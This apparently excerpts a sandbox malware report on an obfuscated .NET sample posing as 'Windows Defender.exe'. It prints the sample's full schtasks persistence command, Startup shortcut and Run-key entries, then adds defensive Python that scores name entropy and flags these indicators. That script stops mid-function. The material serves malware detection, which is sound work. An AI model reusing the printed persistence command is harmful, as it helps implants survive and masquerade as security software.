                      Source: Windows Defender.exe, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                      Source: Windows Defender.exe, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.csHigh entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
                      Source: Windows Defender.exe, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.csHigh entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
                      Source: Windows Defender.exe, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csHigh entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                      Source: Windows Defender.exe, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.csHigh entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.csHigh entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                      Source: Windows Defender.exe, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csHigh entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                      Source: Windows Defender.exe, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csHigh entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                      Source: Windows Defender.exe, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csHigh entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                      Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.cs: High entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                      Source: Windows Defender.exe.0.dr, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.cs: High entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
                      Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.cs: High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                      Source: Windows Defender.exe.0.dr, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.cs: High entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
                      Source: Windows Defender.exe.0.dr, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.cs: High entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
                      Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.cs: High entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                      Source: Windows Defender.exe.0.dr, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.cs: High entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs: High entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                      Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.cs: High entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                      Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.cs: High entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                      Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.cs: High entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack: High entropy of concatenated method names in the same eleven classes (HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.cs through tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.cs) with method names identical to those listed above for Windows Defender.exe.0.dr; the unpacked in-memory image is the same obfuscated assembly as the dropped copy, so the repeated entries are collapsed here.
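                      What the "High entropy of concatenated method names" signature is measuring, as an added example: this is an assumed reconstruction of the heuristic (Joe Sandbox's own scoring is not public) and not code from the sample or from the report. It computes the Shannon entropy of a class's method names joined into one string; the obfuscated names are copied from the tBZCWm7w... class entries above, while the readable contrast names and the 5.0 bit threshold are assumptions of this example.

```python
"""Shannon entropy of a class's concatenated method names.

Added example: an assumed reconstruction of the heuristic behind the
"High entropy of concatenated method names" signature, not Joe Sandbox's code.
The threshold is an assumption; the obfuscated names come from the report,
the readable ones are ordinary .NET method names chosen for contrast.
"""
import math
from collections import Counter


def shannon_entropy(text):
    """Bits per character of the empirical character distribution of text."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def concatenated_name_entropy(method_names):
    """Entropy of all method names joined, which is what the signature scores."""
    return shannon_entropy("".join(method_names))


# Assumed threshold: randomly generated mixed-case alphanumeric names land
# around 5.5 bits/char, while English-like identifiers stay well below 5.
ENTROPY_THRESHOLD = 5.0


def looks_obfuscated(method_names, threshold=ENTROPY_THRESHOLD):
    """True when the joined names are closer to random output than to words."""
    return concatenated_name_entropy(method_names) >= threshold


# Method names of the tBZCWm7w... class, copied from the report.
OBFUSCATED = [
    "E8guj0wkTXSDi5PFQB7VFk",
    "_2BlW37vOQ5lBjwqupApYeu",
    "O3m6VbhYCCdK6SVfSdZECU",
    "_46xAuc1Pk0nvKAyw2iwSns",
]
# Constructed contrast: names as a compiler emits them for readable source.
READABLE = ["Equals", "GetHashCode", "GetType", "ToString",
            "Dispose", "ReadAllBytes", "WriteLine"]

if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED), ("readable", READABLE)):
        print(f"{label}: {concatenated_name_entropy(names):.2f} bits/char, "
              f"flagged={looks_obfuscated(names)}")
```

                      The XTL63OWw... class above shows the heuristic's blind spot in the other direction: its inherited names (Equals, GetHashCode, ToString, the Create__Instance__/Dispose__Instance__ pair) are readable, yet the class still fires because the renamer's own members dominate the concatenation.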
                      Source: C:\Users\user\Desktop\Windows Defender.exe: File created: C:\Users\user\AppData\Local\Windows Defender.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Windows Defender.exe: Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe" (a task that re-launches the dropped copy every minute at the highest run level available to the user; besides surviving reboots it restarts the implant if the process is killed)
                      Source: C:\Users\user\Desktop\Windows Defender.exe: File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk (duplicate entry collapsed)
                      Source: C:\Users\user\Desktop\Windows Defender.exe: Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name "Windows Defender" (duplicate entry collapsed)
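                      Triage logic for the three persistence mechanisms in this section (scheduled task, Startup-folder shortcut, HKCU Run value), as an added example that is not part of the Joe Sandbox report and not code from the sample. The events are constructed to mirror the entries above; the Run value's data path is an assumption, since the report shows only the value name, and the list of impersonated product names and the "every five minutes or less" cut-off are assumptions of this example.

```python
"""Triage of the persistence indicators in the "Boot Survival" entries.

Added example, not part of the Joe Sandbox report or of the sample. The events
below are constructed to mirror the report's entries; the Run value's data is
an assumption (the report shows only the value name). Each assessor returns the
reasons an event looks like malware persistence, so an empty list is benign.
"""
import re
import shlex

# Locations a standard user can write to. A persistence target that lives here
# while naming itself after a Microsoft component is the core mismatch.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\|\\Users\\Public\\|\\ProgramData\\|\\Temp\\",
    re.IGNORECASE)
# Names that impersonate built-in security or OS components (assumed list).
MASQUERADE = re.compile(r"windows defender|microsoft|security|update", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",
                         re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$",
                     re.IGNORECASE)


def parse_schtasks(cmdline):
    """Map each /switch of a schtasks.exe command line to its value (or True)."""
    # posix=False keeps backslashes literal and quoted tokens intact.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    opts = {}
    i = 1  # tokens[0] is the schtasks.exe image path
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = tokens[i].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def assess_schtasks(cmdline):
    """Reasons a schtasks.exe /create invocation looks like persistence."""
    opts = parse_schtasks(cmdline)
    if "/create" not in opts:
        return []
    reasons = []
    target = str(opts.get("/tr", ""))
    in_user_dir = bool(USER_WRITABLE.search(target))
    if in_user_dir:
        reasons.append("task runs a binary from a user-writable directory")
    if str(opts.get("/rl", "")).lower() == "highest":
        reasons.append("requests the highest run level available to the user")
    if str(opts.get("/sc", "")).lower() == "minute":
        try:
            every = int(opts.get("/mo", 1))
        except (TypeError, ValueError):
            every = 1
        if every <= 5:  # assumed cut-off for "watchdog, not maintenance job"
            reasons.append(f"re-launches every {every} minute(s): a watchdog loop")
    if in_user_dir and MASQUERADE.search(str(opts.get("/tn", ""))):
        reasons.append("task name impersonates a Microsoft component")
    return reasons


def assess_registry(key_path, value_name, value_data):
    """Reasons a Run/RunOnce value looks like persistence."""
    reasons = []
    if RUN_KEY.search(key_path):
        if USER_WRITABLE.search(value_data):
            reasons.append("Run value launches a binary from a user-writable directory")
        if MASQUERADE.search(value_name):
            reasons.append("Run value name impersonates a Microsoft component")
    return reasons


def assess_file(path):
    """Reasons a created file looks like Startup-folder persistence."""
    reasons = []
    if STARTUP_DIR.search(path) and path.lower().endswith(".lnk"):
        reasons.append("shortcut dropped into the per-user Startup folder")
        if MASQUERADE.search(path.rsplit("\\", 1)[-1]):
            reasons.append("Startup shortcut name impersonates a Microsoft component")
    return reasons


ASSESSORS = {"process": assess_schtasks, "file": assess_file,
             "registry": lambda payload: assess_registry(*payload)}

# Constructed events mirroring the report, plus one benign task for contrast.
SAMPLE_EVENTS = [
    ("process", r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                r'/tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"'),
    ("file", r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk"),
    ("registry", (r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
                  "Windows Defender",
                  r"C:\Users\user\AppData\Local\Windows Defender.exe")),  # data assumed
    ("process", r'"C:\Windows\System32\schtasks.exe" /create /tn "Nightly Backup" /sc daily '
                r'/st 02:00 /tr "C:\Program Files\Backup\backup.exe"'),
]


def triage(events):
    """Return (kind, reasons) for every event that has at least one reason."""
    findings = []
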